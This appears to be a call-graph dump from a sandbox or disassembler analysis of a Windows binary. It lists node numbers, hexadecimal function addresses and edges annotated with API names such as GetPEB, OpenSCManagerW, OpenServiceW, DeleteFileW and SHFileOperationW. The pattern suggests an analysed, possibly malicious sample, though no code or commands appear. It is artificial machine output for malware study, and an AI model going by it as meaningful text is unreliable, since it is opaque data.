3914 583cc9 4160 578c7c 3914->4160 3915 576a8d GetPEB 3915->3944 3919 58acff RtlAllocateHeap GetPEB 3919->3944 3928 583cb3 4150 57c7d1 3928->4150 3931 57e080 RtlAllocateHeap GetPEB 3931->3944 3936 583ca3 3936->3907 3944->3914 3944->3915 3944->3919 3944->3928 3944->3931 3944->3936 3946 57b9d7 GetPEB 3944->3946 3950 580418 3944->3950 3960 58d14c 3944->3960 3974 57b4fc 3944->3974 3981 574700 3944->3981 3991 576cbb 3944->3991 4003 57be09 3944->4003 4014 5766b0 3944->4014 4022 58882f 3944->4022 4035 58158a 3944->4035 4039 585497 3944->4039 4046 57da93 3944->4046 4050 574cb9 3944->4050 4054 58d6b1 3944->4054 4062 58afb0 3944->4062 4071 58e612 3944->4071 4077 58519b 3944->4077 4080 58ec9b 3944->4080 4086 58c535 3944->4086 4097 571b09 3944->4097 4107 58eba2 3944->4107 4112 58dad8 3944->4112 4116 58b2fc 3944->4116 4119 58baf2 3944->4119 4130 5730be 3944->4130 4135 58c16b 3944->4135 4145 575995 3944->4145 3946->3944 3948 58bff0 GetPEB 3947->3948 3949 57bb17 ExitProcess 3948->3949 3949->3909 3952 58073f 3950->3952 3954 580871 3952->3954 3957 58086f 3952->3957 4174 58a98e 3952->4174 4178 5866c2 3952->4178 4182 5732b5 3952->4182 4186 574e77 3952->4186 4192 58eaa3 3952->4192 4197 579574 3954->4197 3957->3944 3969 58d4fd 3960->3969 3963 58eaa3 RtlAllocateHeap GetPEB 3963->3969 3964 58d67f 4240 576a8d 3964->4240 3967 58d538 4232 57d5cb 3967->4232 3969->3963 3969->3964 3969->3967 3971 58d557 3969->3971 4220 574bb4 3969->4220 4224 57d68b 3969->4224 4228 57c706 3969->4228 4236 57b9d7 3969->4236 3971->3944 3972 576a8d GetPEB 3972->3971 3977 57b7a3 3974->3977 3975 58a98e CloseServiceHandle GetPEB 3975->3977 3976 5732b5 2 API calls 3976->3977 3977->3975 3977->3976 3978 57b8ea 3977->3978 4250 57c4eb 3977->4250 4254 581070 3977->4254 3978->3944 3985 5749df 3981->3985 3982 579574 GetPEB 3982->3985 3983 574a21 3983->3944 3984 574bb4 2 API calls 3984->3985 3985->3982 3985->3983 3985->3984 3986 574a0b 3985->3986 3990 57b9d7 GetPEB 3985->3990 4268 59110e 3985->4268 4282 58734a 3985->4282 4258 57d346 3986->4258 3990->3985 4301 57588d 3991->4301 3993 5770ab 3994 577204 3993->3994 3995 5770da 3993->3995 3996 574bb4 RtlAllocateHeap GetPEB 3993->3996 4000 58734a GetPEB 3993->4000 4002 57b9d7 GetPEB 3993->4002 4304 57f2b9 3993->4304 4307 581bed 3993->4307 3994->3994 3998 59110e 2 API calls 3995->3998 3996->3993 3999 5770fb 3998->3999 3999->3944 4000->3993 4002->3993 4005 57c23f 4003->4005 4006 57c431 4005->4006 4007 574bb4 2 API calls 4005->4007 4009 58734a GetPEB 4005->4009 4011 57c42f 4005->4011 4013 57b9d7 GetPEB 4005->4013 4311 57f1d5 4005->4311 4315 58bf1c 4005->4315 4319 5818f7 4005->4319 4008 58e373 2 API calls 4006->4008 4007->4005 4008->4011 4009->4005 4011->3944 4013->4005 4015 576937 4014->4015 4016 58bf1c 2 API calls 4015->4016 4017 576a80 4015->4017 4019 579574 GetPEB 4015->4019 4020 5818f7 GetPEB 4015->4020 4021 58e373 2 API calls 4015->4021 4323 58ba34 4015->4323 4016->4015 4017->3944 4019->4015 4020->4015 4021->4015 4023 588f07 4022->4023 4025 58915b 4023->4025 4026 5866c2 2 API calls 4023->4026 4027 5732b5 2 API calls 4023->4027 4029 58a98e 2 API calls 4023->4029 4030 589159 4023->4030 4031 574bb4 2 API calls 4023->4031 4033 581bed GetPEB 4023->4033 4034 57b9d7 GetPEB 4023->4034 4327 573511 4023->4327 4340 5740d2 4023->4340 4028 58a98e 2 API calls 4025->4028 4026->4023 4027->4023 4028->4030 4029->4023 4030->3944 4031->4023 4033->4023 4034->4023 4036 5815a4 4035->4036 4037 5816a8 4036->4037 4038 5809f9 LoadLibraryW RtlAllocateHeap GetPEB 4036->4038 4037->3944 4038->4036 4040 5854b9 4039->4040 4041 58587a 4040->4041 4042 585878 4040->4042 4045 58eaa3 2 API calls 4040->4045 4356 574627 4040->4356 4043 574627 GetPEB 4041->4043 4042->3944 4043->4042 4045->4040 4047 57daa9 4046->4047 4048 58bff0 GetPEB 4047->4048 4049 57db4e 4048->4049 4049->3944 4051 574cd5 4050->4051 4052 58bff0 GetPEB 4051->4052 4053 574d6f 4052->4053 4053->3944 4059 58d91e 4054->4059 4057 58da08 4057->3944 4058 574bb4 2 API calls 4058->4059 4059->4057 4059->4058 4060 58734a GetPEB 4059->4060 4061 57b9d7 GetPEB 4059->4061 4368 57ffde 4059->4368 4372 585d68 4059->4372 4060->4059 4061->4059 4069 58afca 4062->4069 4063 58eaa3 2 API calls 4063->4069 4064 58b130 4065 576a8d GetPEB 4064->4065 4066 58b12e 4065->4066 4066->3944 4069->4063 4069->4064 4069->4066 4396 57c5c3 4069->4396 4400 585031 4069->4400 4404 59225a 4069->4404 4073 58e794 4071->4073 4075 58e822 4073->4075 4076 58eaa3 2 API calls 4073->4076 4524 59032a 4073->4524 4528 58aa59 4073->4528 4075->3944 4076->4073 4078 58eaa3 2 API calls 4077->4078 4079 5851d5 4078->4079 4079->3944 4083 58ee36 4080->4083 4082 58ef0f 4082->3944 4083->4082 4085 57ffde GetPEB 4083->4085 4532 57ba25 4083->4532 4535 580c7c 4083->4535 4085->4083 4092 58cd1c 4086->4092 4088 574bb4 RtlAllocateHeap GetPEB 4088->4092 4089 58ade9 GetPEB 4089->4092 4090 581bed GetPEB 4090->4092 4091 5866c2 2 API calls 4091->4092 4092->4088 4092->4089 4092->4090 4092->4091 4093 58cfb1 4092->4093 4094 57b9d7 GetPEB 4092->4094 4573 573f09 4092->4573 4577 591cad 4092->4577 4581 573152 4092->4581 4093->3944 4094->4092 4105 571b3f 4097->4105 4099 57225e 4099->3944 4100 57b184 GetPEB 4100->4105 4105->4099 4105->4100 4106 576a8d GetPEB 4105->4106 4585 57a01c 4105->4585 4602 5927df 4105->4602 4612 5895a8 4105->4612 4629 589184 4105->4629 4638 5847d2 4105->4638 4106->4105 4108 58ec4b 4107->4108 4110 58eaa3 2 API calls 4108->4110 4111 58ec91 4108->4111 4781 5903f2 4108->4781 4110->4108 4111->3944 4113 58dd12 4112->4113 4114 57f2b9 GetPEB 4113->4114 4115 58dd3a 4113->4115 4114->4113 4115->3944 4117 574cb9 GetPEB 4116->4117 4118 58b37d 4117->4118 4118->3944 4121 58bb13 4119->4121 4126 58eaa3 2 API calls 4121->4126 4127 58bf0f 4121->4127 4814 57bb23 4121->4814 4821 59086f 4121->4821 4833 58f24c 4121->4833 4854 572279 4121->4854 4872 57ced8 4121->4872 4880 5913fd 4121->4880 4888 58692b 4121->4888 4126->4121 4127->3944 4131 57588d GetPEB 4130->4131 4132 57313a 4131->4132 5017 58da13 4132->5017 4136 58c3a6 4135->4136 4137 576a8d GetPEB 4136->4137 4139 58c516 4136->4139 4143 58c514 4136->4143 5021 585cb1 4136->5021 5025 580097 4136->5025 5030 57f605 4136->5030 5034 57e2b2 4136->5034 4137->4136 5037 57f9a7 4139->5037 4143->3944 4148 575aa2 4145->4148 4146 575b7d 4146->3944 4148->4146 5041 585c05 4148->5041 5045 57e0eb 4148->5045 4159 57c7eb 4150->4159 4151 574bb4 RtlAllocateHeap GetPEB 4151->4159 4152 57ce91 4155 5863f0 3 API calls 4152->4155 4153 5866c2 2 API calls 4153->4159 4154 57c453 GetPEB 4154->4159 4156 57ce8f 4155->4156 4156->3936 4157 57b9d7 GetPEB 4157->4159 4158 581bed GetPEB 4158->4159 4159->4151 4159->4152 4159->4153 4159->4154 4159->4156 4159->4157 4159->4158 4165 578fba 4160->4165 4161 574bb4 2 API calls 4161->4165 4163 58734a GetPEB 4163->4165 4165->4161 4165->4163 4166 5790e2 4165->4166 4167 57b9d7 GetPEB 4165->4167 4169 59110e 2 API calls 4165->4169 4170 57b4fc 4 API calls 4165->4170 4171 5790e0 4165->4171 5049 57d899 4165->5049 5056 579133 4165->5056 4168 57ffde GetPEB 4166->4168 4167->4165 4172 5790fb 4168->4172 4169->4165 4170->4165 4171->3936 5065 57f6cf 4172->5065 4175 58a9a1 4174->4175 4176 58bff0 GetPEB 4175->4176 4177 58aa46 CloseServiceHandle 4176->4177 4177->3952 4179 5866e9 4178->4179 4180 58bff0 GetPEB 4179->4180 4181 58676b SHGetFolderPathW 4180->4181 4181->3952 4183 5732cd 4182->4183 4184 58bff0 GetPEB 4183->4184 4185 57337c OpenSCManagerW 4184->4185 4185->3952 4189 574fae 4186->4189 4190 579574 GetPEB 4189->4190 4191 575080 4189->4191 4201 58ade9 4189->4201 4205 5907bb 4189->4205 4190->4189 4191->3952 4209 57645e 4192->4209 4196 58eb9a 4196->3952 4198 57958e 4197->4198 4216 579aac 4198->4216 4202 58ae00 4201->4202 4203 58bff0 GetPEB 4202->4203 4204 58aea1 4203->4204 4204->4189 4206 5907d1 4205->4206 4207 58bff0 GetPEB 4206->4207 4208 590861 4207->4208 4208->4189 4210 58bff0 GetPEB 4209->4210 4211 5764fc 4210->4211 4212 581b22 4211->4212 4213 581b41 4212->4213 4214 58bff0 GetPEB 4213->4214 4215 581bdd RtlAllocateHeap 4214->4215 4215->4196 4217 579ace 4216->4217 4218 58bff0 GetPEB 4217->4218 4219 579601 4218->4219 4219->3957 4221 574bce 4220->4221 4222 58eaa3 2 API calls 4221->4222 4223 574c3e 4222->4223 4223->3969 4223->4223 4225 57d6aa 4224->4225 4226 58bff0 GetPEB 4225->4226 4227 57d746 4226->4227 4227->3969 4229 57c728 4228->4229 4230 58bff0 GetPEB 4229->4230 4231 57c7bd 4230->4231 4231->3969 4233 57d5e4 4232->4233 4234 58bff0 GetPEB 4233->4234 4235 57d67d 4234->4235 4235->3971 4237 57b9e9 4236->4237 4238 576a8d GetPEB 4237->4238 4239 57ba1e 4238->4239 4239->3969 4241 576a9d 4240->4241 4242 57645e GetPEB 4241->4242 4243 576bbb 4242->4243 4246 5850b6 4243->4246 4247 5850d5 4246->4247 4248 58bff0 GetPEB 4247->4248 4249 576bd4 4248->4249 4249->3972 4251 57c507 4250->4251 4252 58bff0 GetPEB 4251->4252 4253 57c5b2 OpenServiceW 4252->4253 4253->3977 4255 581089 4254->4255 4256 58bff0 GetPEB 4255->4256 4257 581122 4256->4257 4257->3977 4259 57d35d 4258->4259 4260 574bb4 2 API calls 4259->4260 4261 57d4ea 4260->4261 4286 57fd5f 4261->4286 4264 57b9d7 GetPEB 4265 57d516 4264->4265 4290 579ea8 4265->4290 4267 57d52a 4267->3983 4269 591128 4268->4269 4270 57b184 GetPEB 4269->4270 4271 59135e 4270->4271 4272 57b184 GetPEB 4271->4272 4273 591378 4272->4273 4274 57b184 GetPEB 4273->4274 4275 59138d 4274->4275 4276 5907bb GetPEB 4275->4276 4277 5913a2 4276->4277 4278 5907bb GetPEB 4277->4278 4279 5913ba 4278->4279 4297 57338b 4279->4297 4281 5913f0 4281->3985 4283 58736f 4282->4283 4284 57f56b GetPEB 4283->4284 4285 58738c 4284->4285 4285->3985 4287 57fd7b 4286->4287 4294 57f56b 4287->4294 4291 579ebe 4290->4291 4292 58bff0 GetPEB 4291->4292 4293 579f4d DeleteFileW 4292->4293 4293->4267 4295 58bff0 GetPEB 4294->4295 4296 57d507 4295->4296 4296->4264 4298 57339b 4297->4298 4299 58bff0 GetPEB 4298->4299 4300 573449 SHFileOperationW 4299->4300 4300->4281 4302 58bff0 GetPEB 4301->4302 4303 575939 4302->4303 4303->3993 4305 58bff0 GetPEB 4304->4305 4306 57f361 4305->4306 4306->3993 4308 581c12 4307->4308 4309 57f56b GetPEB 4308->4309 4310 581c34 4309->4310 4310->3993 4312 57f1fa 4311->4312 4313 58bff0 GetPEB 4312->4313 4314 57f2a8 SetFileInformationByHandle 4313->4314 4314->4005 4316 58bf49 4315->4316 4317 58bff0 GetPEB 4316->4317 4318 58bfd6 CreateFileW 4317->4318 4318->4005 4320 58190a 4319->4320 4321 58bff0 GetPEB 4320->4321 4322 581999 4321->4322 4322->4005 4324 58ba53 4323->4324 4325 58bff0 GetPEB 4324->4325 4326 58bae0 4325->4326 4326->4015 4334 573537 4327->4334 4328 573c34 4330 576a8d GetPEB 4328->4330 4329 58eaa3 RtlAllocateHeap GetPEB 4329->4334 4333 573c45 4330->4333 4331 576a8d GetPEB 4331->4334 4333->4023 4334->4328 4334->4329 4334->4331 4334->4333 4336 58a98e 2 API calls 4334->4336 4337 57c4eb 2 API calls 4334->4337 4339 57f2b9 GetPEB 4334->4339 4344 58b14e 4334->4344 4348 5813d4 4334->4348 4352 58a3e6 4334->4352 4336->4334 4337->4334 4339->4334 4341 57411c 4340->4341 4342 58bff0 GetPEB 4341->4342 4343 57419f 4342->4343 4343->4023 4345 58b16a 4344->4345 4346 58bff0 GetPEB 4345->4346 4347 58b205 4346->4347 4347->4334 4349 58140f 4348->4349 4350 58bff0 GetPEB 4349->4350 4351 5814bb 4350->4351 4351->4334 4353 58a415 4352->4353 4354 58bff0 GetPEB 4353->4354 4355 58a4a0 4354->4355 4355->4334 4357 574640 4356->4357 4360 581d1c 4357->4360 4361 581d3a 4360->4361 4364 572fe6 4361->4364 4365 573002 4364->4365 4366 58bff0 GetPEB 4365->4366 4367 5730ae 4366->4367 4367->4040 4369 57fff1 4368->4369 4370 58bff0 GetPEB 4369->4370 4371 58008b 4370->4371 4371->4059 4379 585d94 4372->4379 4373 5863d3 4392 57428c 4373->4392 4375 5863d1 4375->4059 4376 574bb4 RtlAllocateHeap GetPEB 4376->4379 4379->4373 4379->4375 4379->4376 4380 58734a GetPEB 4379->4380 4381 57fd5f GetPEB 4379->4381 4382 585d68 2 API calls 4379->4382 4383 57b9d7 GetPEB 4379->4383 4384 57fa6c 4379->4384 4388 57fe4b 4379->4388 4380->4379 4381->4379 4382->4379 4383->4379 4385 57fa85 4384->4385 4386 58bff0 GetPEB 4385->4386 4387 57fb15 4386->4387 4387->4379 4389 57fe5e 4388->4389 4390 58bff0 GetPEB 4389->4390 4391 57fef3 4390->4391 4391->4379 4393 5742a5 4392->4393 4394 58bff0 GetPEB 4393->4394 4395 574337 4394->4395 4395->4375 4397 57c635 4396->4397 4398 57c61f 4396->4398 4397->4069 4398->4397 4399 576a8d GetPEB 4398->4399 4399->4398 4401 585047 4400->4401 4414 580b4c 4401->4414 4411 59252f 4404->4411 4405 574bb4 2 API calls 4405->4411 4406 592704 4406->4069 4407 5926f3 4409 576a8d GetPEB 4407->4409 4409->4406 4410 58eaa3 2 API calls 4410->4411 4411->4405 4411->4406 4411->4407 4411->4410 4412 57b9d7 GetPEB 4411->4412 4516 58acff 4411->4516 4520 57c453 4411->4520 4412->4411 4415 580b68 4414->4415 4417 580c59 4415->4417 4420 580c57 4415->4420 4421 58eaa3 2 API calls 4415->4421 4423 577786 4415->4423 4440 57508b 4415->4440 4449 573210 4415->4449 4419 576a8d GetPEB 4417->4419 4419->4420 4420->4069 4421->4415 4434 57842c 4423->4434 4424 5788b0 4425 57d5cb GetPEB 4424->4425 4428 5788ae 4425->4428 4427 57f36a GetPEB 4427->4434 4428->4415 4431 574bb4 RtlAllocateHeap GetPEB 4431->4434 4434->4424 4434->4427 4434->4428 4434->4431 4437 581d1c GetPEB 4434->4437 4438 57d68b GetPEB 4434->4438 4439 57b9d7 GetPEB 4434->4439 4454 579f58 4434->4454 4458 57bd30 4434->4458 4462 57b40a 4434->4462 4466 57fd9d 4434->4466 4470 587473 4434->4470 4496 574d7d 4434->4496 4500 58677f 4434->4500 4437->4434 4438->4434 4439->4434 4448 5755c3 4440->4448 4441 57575d 4443 57d5cb GetPEB 4441->4443 4442 57575b 4442->4415 4443->4442 4444 574bb4 RtlAllocateHeap GetPEB 4444->4448 4445 57d68b GetPEB 4445->4448 4446 57b40a GetPEB 4446->4448 4447 57b9d7 GetPEB 4447->4448 4448->4441 4448->4442 4448->4444 4448->4445 4448->4446 4448->4447 4450 58677f GetPEB 4449->4450 4451 57329c 4450->4451 4452 576a8d GetPEB 4451->4452 4453 5732af 4452->4453 4453->4415 4455 579f7a 4454->4455 4456 58bff0 GetPEB 4455->4456 4457 57a009 4456->4457 4457->4434 4459 57bd52 4458->4459 4460 58bff0 GetPEB 4459->4460 4461 57bdf5 4460->4461 4461->4434 4463 57b43a 4462->4463 4464 58bff0 GetPEB 4463->4464 4465 57b4e0 4464->4465 4465->4434 4467 57fdb3 4466->4467 4468 58bff0 GetPEB 4467->4468 4469 57fe3d 4468->4469 4469->4434 4475 588307 4470->4475 4471 57d5cb GetPEB 4471->4475 4472 576a8d GetPEB 4472->4475 4473 574bb4 RtlAllocateHeap GetPEB 4493 5886af 4473->4493 4474 588558 4479 574bb4 2 API calls 4474->4479 4475->4471 4475->4472 4475->4474 4477 5887d6 4475->4477 4478 58eaa3 2 API calls 4475->4478 4482 574bb4 RtlAllocateHeap GetPEB 4475->4482 4483 57b9d7 GetPEB 4475->4483 4475->4493 4504 578ab6 4475->4504 4508 5765d5 4475->4508 4477->4434 4478->4475 4480 588578 4479->4480 4481 574bb4 2 API calls 4480->4481 4485 58859a 4481->4485 4482->4475 4483->4475 4484 57d68b GetPEB 4484->4493 4486 58ade9 GetPEB 4485->4486 4488 5885c6 4486->4488 4512 58cfc3 4488->4512 4490 57b9d7 GetPEB 4490->4493 4492 57b9d7 GetPEB 4494 588697 4492->4494 4493->4473 4493->4484 4493->4490 4495 57b9d7 GetPEB 4494->4495 4495->4493 4497 574dad 4496->4497 4498 58bff0 GetPEB 4497->4498 4499 574e5c 4498->4499 4499->4434 4501 586792 4500->4501 4502 58bff0 GetPEB 4501->4502 4503 586834 4502->4503 4503->4434 4505 578af6 4504->4505 4506 58bff0 GetPEB 4505->4506 4507 578baa 4506->4507 4507->4475 4509 576602 4508->4509 4510 58bff0 GetPEB 4509->4510 4511 576697 4510->4511 4511->4475 4513 58cff4 4512->4513 4514 58bff0 GetPEB 4513->4514 4515 588667 4514->4515 4515->4492 4517 58ad1f 4516->4517 4518 58eaa3 2 API calls 4517->4518 4519 58ad9c 4518->4519 4519->4411 4519->4519 4521 57c481 4520->4521 4522 57f56b GetPEB 4521->4522 4523 57c4a8 4522->4523 4523->4411 4525 590343 4524->4525 4526 58bff0 GetPEB 4525->4526 4527 5903e4 4526->4527 4527->4073 4529 58aa83 4528->4529 4530 58bff0 GetPEB 4529->4530 4531 58ab22 4530->4531 4531->4073 4543 583cdd 4532->4543 4536 580c9d 4535->4536 4566 57f43b 4536->4566 4539 580e00 4539->4083 4542 58e373 2 API calls 4542->4539 4546 583d02 4543->4546 4548 583f17 4546->4548 4550 57ba93 4546->4550 4552 575942 4546->4552 4555 581a72 4546->4555 4559 58efa0 4546->4559 4563 57b34c 4546->4563 4551 58e373 2 API calls 4548->4551 4550->4083 4551->4550 4553 57588d GetPEB 4552->4553 4554 57597a 4553->4554 4554->4546 4556 581a88 4555->4556 4557 58bff0 GetPEB 4556->4557 4558 581b14 4557->4558 4558->4546 4560 58efb9 4559->4560 4561 58bff0 GetPEB 4560->4561 4562 58f052 4561->4562 4562->4546 4564 58bff0 GetPEB 4563->4564 4565 57b3f2 4564->4565 4565->4546 4567 58bff0 GetPEB 4566->4567 4568 57f4f2 4567->4568 4568->4539 4569 5814da 4568->4569 4570 5814f9 4569->4570 4571 58bff0 GetPEB 4570->4571 4572 580dee 4571->4572 4572->4542 4574 573f42 4573->4574 4575 58bff0 GetPEB 4574->4575 4576 573ff1 4575->4576 4576->4092 4578 591cd8 4577->4578 4579 58bff0 GetPEB 4578->4579 4580 591d53 4579->4580 4580->4092 4582 573169 4581->4582 4583 58bff0 GetPEB 4582->4583 4584 573203 4583->4584 4584->4092 4600 57a07f 4585->4600 4586 585b4c GetPEB 4586->4600 4588 57b074 4682 585b4c 4588->4682 4591 574bb4 2 API calls 4591->4600 4592 57b08a 4592->4105 4597 576a8d GetPEB 4597->4600 4598 57b9d7 GetPEB 4598->4600 4600->4586 4600->4588 4600->4591 4600->4592 4600->4597 4600->4598 4601 58e29a GetPEB 4600->4601 4650 5841cf 4600->4650 4659 575797 4600->4659 4663 575b8a 4600->4663 4666 576505 4600->4666 4670 57400f 4600->4670 4674 58aeae 4600->4674 4678 58b215 4600->4678 4601->4600 4610 592a55 4602->4610 4604 58eaa3 2 API calls 4604->4610 4605 592bb0 4606 576a8d GetPEB 4605->4606 4607 592bae 4606->4607 4607->4105 4608 574bb4 2 API calls 4608->4610 4609 57f56b GetPEB 4609->4610 4610->4604 4610->4605 4610->4607 4610->4608 4610->4609 4611 57b9d7 GetPEB 4610->4611 4694 5851e8 4610->4694 4611->4610 4626 589fc8 4612->4626 4613 576a8d GetPEB 4613->4626 4614 58a353 4615 58e18b 2 API calls 4614->4615 4617 58a379 4615->4617 4616 581d1c GetPEB 4616->4626 4713 57c4b0 4617->4713 4618 58eaa3 RtlAllocateHeap GetPEB 4618->4626 4620 58a34e 4620->4105 4622 574bb4 2 API calls 4622->4626 4625 57b9d7 GetPEB 4625->4620 4626->4613 4626->4614 4626->4616 4626->4618 4626->4620 4626->4622 4627 57f56b GetPEB 4626->4627 4628 57b9d7 GetPEB 4626->4628 4705 58e18b 4626->4705 4709 589556 4626->4709 4627->4626 4628->4626 4630 5891ae 4629->4630 4631 589537 4630->4631 4634 589535 4630->4634 4636 58eaa3 2 API calls 4630->4636 4637 581d1c GetPEB 4630->4637 4717 5816ad 4630->4717 4723 579617 4630->4723 4633 576a8d GetPEB 4631->4633 4633->4634 4634->4105 4636->4630 4637->4630 4644 5847fd 4638->4644 4640 58500a 4643 576a8d GetPEB 4640->4643 4648 58501e 4643->4648 4644->4640 4645 581d1c GetPEB 4644->4645 4646 576a8d GetPEB 4644->4646 4647 57e379 2 API calls 4644->4647 4644->4648 4649 58eaa3 2 API calls 4644->4649 4765 574342 4644->4765 4770 58a4b5 4644->4770 4777 578bcb 4644->4777 4645->4644 4646->4644 4647->4644 4648->4105 4649->4644 4651 584420 4650->4651 4652 58eaa3 RtlAllocateHeap GetPEB 4651->4652 4653 584518 4651->4653 4657 581d1c GetPEB 4651->4657 4658 576a8d GetPEB 4651->4658 4686 577209 4651->4686 4652->4651 4655 584520 4653->4655 4656 576a8d GetPEB 4653->4656 4655->4600 4656->4655 4657->4651 4658->4651 4660 5757d2 4659->4660 4661 58bff0 GetPEB 4660->4661 4662 575872 4661->4662 4662->4600 4690 591933 4663->4690 4667 57652a 4666->4667 4668 58bff0 GetPEB 4667->4668 4669 5765c3 4668->4669 4669->4600 4671 574036 4670->4671 4672 58bff0 GetPEB 4671->4672 4673 5740bd 4672->4673 4673->4600 4675 58aedf 4674->4675 4676 58bff0 GetPEB 4675->4676 4677 58af74 4676->4677 4677->4600 4679 58b237 4678->4679 4680 58bff0 GetPEB 4679->4680 4681 58b2e9 4680->4681 4681->4600 4683 585b62 4682->4683 4684 58bff0 GetPEB 4683->4684 4685 585bfa 4684->4685 4685->4592 4687 57722b 4686->4687 4688 58bff0 GetPEB 4687->4688 4689 5772b9 4688->4689 4689->4651 4691 591957 4690->4691 4692 58bff0 GetPEB 4691->4692 4693 575c87 4692->4693 4693->4600 4698 5851fe 4694->4698 4695 58545d 4697 57c63a GetPEB 4695->4697 4696 58545b 4696->4610 4697->4696 4698->4695 4698->4696 4700 58eaa3 2 API calls 4698->4700 4701 57c63a 4698->4701 4700->4698 4702 57c662 4701->4702 4703 58bff0 GetPEB 4702->4703 4704 57c6f0 4703->4704 4704->4698 4706 58e1a5 4705->4706 4707 58eaa3 2 API calls 4706->4707 4708 58e230 4707->4708 4708->4626 4708->4708 4710 58957e 4709->4710 4711 57f56b GetPEB 4710->4711 4712 5895a0 4711->4712 4712->4626 4714 57c4c9 4713->4714 4715 57f56b GetPEB 4714->4715 4716 57c4e3 4715->4716 4716->4625 4721 5816c7 4717->4721 4718 5818a9 4745 58595c 4718->4745 4719 5818a7 4719->4630 4721->4718 4721->4719 4730 57e379 4721->4730 4725 579644 4723->4725 4724 58eaa3 2 API calls 4724->4725 4725->4724 4726 5812ef GetPEB 4725->4726 4727 579985 4725->4727 4728 579996 4725->4728 4726->4725 4729 576a8d GetPEB 4727->4729 4728->4630 4729->4728 4737 57e3b8 4730->4737 4731 57f19d 4732 57d5cb GetPEB 4731->4732 4734 57f19b 4732->4734 4733 574bb4 RtlAllocateHeap GetPEB 4733->4737 4734->4721 4736 58eaa3 2 API calls 4736->4737 4737->4731 4737->4733 4737->4734 4737->4736 4739 5765d5 GetPEB 4737->4739 4740 576a8d GetPEB 4737->4740 4743 57d68b GetPEB 4737->4743 4744 57b9d7 GetPEB 4737->4744 4749 5741c6 4737->4749 4753 57b8f4 4737->4753 4757 57fb23 4737->4757 4761 58ac2c 4737->4761 4739->4737 4740->4737 4743->4737 4744->4737 4746 585988 4745->4746 4747 58bff0 GetPEB 4746->4747 4748 585a2b 4747->4748 4748->4719 4750 5741eb 4749->4750 4751 58bff0 GetPEB 4750->4751 4752 574279 4751->4752 4752->4737 4754 57b919 4753->4754 4755 58bff0 GetPEB 4754->4755 4756 57b9c4 4755->4756 4756->4737 4758 57fb3c 4757->4758 4759 58bff0 GetPEB 4758->4759 4760 57fbed 4759->4760 4760->4737 4762 58ac56 4761->4762 4763 58bff0 GetPEB 4762->4763 4764 58ace2 4763->4764 4764->4737 4769 574361 4765->4769 4766 5745f4 4766->4644 4767 574627 GetPEB 4767->4769 4768 58eaa3 2 API calls 4768->4769 4769->4766 4769->4767 4769->4768 4772 58a4e1 4770->4772 4771 58e436 GetPEB 4771->4772 4772->4771 4773 58a872 4772->4773 4774 58a861 4772->4774 4775 58eaa3 2 API calls 4772->4775 4773->4644 4776 576a8d GetPEB 4774->4776 4775->4772 4776->4773 4778 578bde 4777->4778 4779 581d1c GetPEB 4778->4779 4780 578c72 4779->4780 4780->4644 4782 59041a 4781->4782 4784 5906d7 4782->4784 4785 590738 4782->4785 4802 576bfa 4782->4802 4786 58e18b 2 API calls 4784->4786 4785->4108 4787 5906f1 4786->4787 4793 58112d 4787->4793 4792 57b9d7 GetPEB 4792->4785 4806 574b09 4793->4806 4796 5812e4 4798 58ef56 4796->4798 4799 58ef7b 4798->4799 4800 57f56b GetPEB 4799->4800 4801 58ef98 4800->4801 4801->4792 4803 576c16 4802->4803 4804 58bff0 GetPEB 4803->4804 4805 576cad 4804->4805 4805->4782 4807 574b23 4806->4807 4808 58bff0 GetPEB 4807->4808 4809 574ba7 4808->4809 4809->4796 4810 58683f 4809->4810 4811 586871 4810->4811 4812 58bff0 GetPEB 4811->4812 4813 586911 4812->4813 4813->4796 4815 57bcba 4814->4815 4816 57bd24 4815->4816 4817 576a8d GetPEB 4815->4817 4818 574cb9 GetPEB 4815->4818 4820 58e373 2 API calls 4815->4820 4908 580f7a 4815->4908 4816->4121 4817->4815 4818->4815 4820->4815 4829 590d01 4821->4829 4822 579574 GetPEB 4822->4829 4823 590d19 4916 5863f0 4823->4916 4825 590d42 4825->4121 4826 57ffde GetPEB 4826->4829 4828 574bb4 2 API calls 4828->4829 4829->4822 4829->4823 4829->4825 4829->4826 4829->4828 4830 58734a GetPEB 4829->4830 4831 57b9d7 GetPEB 4829->4831 4926 57b200 4829->4926 4930 579b80 4829->4930 4830->4829 4831->4829 4941 58e034 4833->4941 4835 5863f0 3 API calls 4836 58fedc 4835->4836 4836->4835 4837 5866c2 2 API calls 4836->4837 4838 58ade9 GetPEB 4836->4838 4839 574bb4 RtlAllocateHeap GetPEB 4836->4839 4840 5851e8 2 API calls 4836->4840 4841 5902ff 4836->4841 4845 579574 GetPEB 4836->4845 4846 581bed GetPEB 4836->4846 4847 5902fd 4836->4847 4848 576a8d GetPEB 4836->4848 4849 57ffde GetPEB 4836->4849 4850 57b200 GetPEB 4836->4850 4851 58734a GetPEB 4836->4851 4852 57b9d7 GetPEB 4836->4852 4853 579b80 3 API calls 4836->4853 4944 57f784 4836->4944 4950 57d7a6 4836->4950 4837->4836 4838->4836 4839->4836 4840->4836 4843 58e373 2 API calls 4841->4843 4843->4847 4845->4836 4846->4836 4847->4121 4848->4836 4849->4836 4850->4836 4851->4836 4852->4836 4853->4836 4869 572bc8 4854->4869 4855 5863f0 3 API calls 4855->4869 4858 579574 GetPEB 4858->4869 4859 5730be GetPEB 4859->4869 4860 572c31 4860->4121 4860->4860 4861 58e373 GetPEB CloseHandle 4861->4869 4862 57ffde GetPEB 4862->4869 4863 572c16 4865 58e373 2 API calls 4863->4865 4865->4860 4866 57b200 GetPEB 4866->4869 4867 574bb4 2 API calls 4867->4869 4868 58734a GetPEB 4868->4869 4869->4855 4869->4858 4869->4859 4869->4860 4869->4861 4869->4862 4869->4863 4869->4866 4869->4867 4869->4868 4870 57b9d7 GetPEB 4869->4870 4871 579b80 3 API calls 4869->4871 4954 590e6d 4869->4954 4962 57fbf8 4869->4962 4965 57db59 4869->4965 4870->4869 4871->4869 4878 57d206 4872->4878 4873 58aa59 GetPEB 4873->4878 4874 57d24f 4874->4121 4875 57d23b 4877 580f7a GetPEB 4875->4877 4877->4874 4878->4873 4878->4874 4878->4875 4996 573c51 4878->4996 5004 580e0b 4878->5004 4886 591738 4880->4886 4881 591781 4881->4121 4882 58aa59 GetPEB 4882->4886 4883 573c51 GetPEB 4883->4886 4884 59176d 4885 580f7a GetPEB 4884->4885 4885->4881 4886->4881 4886->4882 4886->4883 4886->4884 4887 580e0b GetPEB 4886->4887 4887->4886 4889 58710c 4888->4889 4890 579574 GetPEB 4889->4890 4891 587210 4889->4891 4892 587128 4889->4892 4894 57ffde GetPEB 4889->4894 4897 57b200 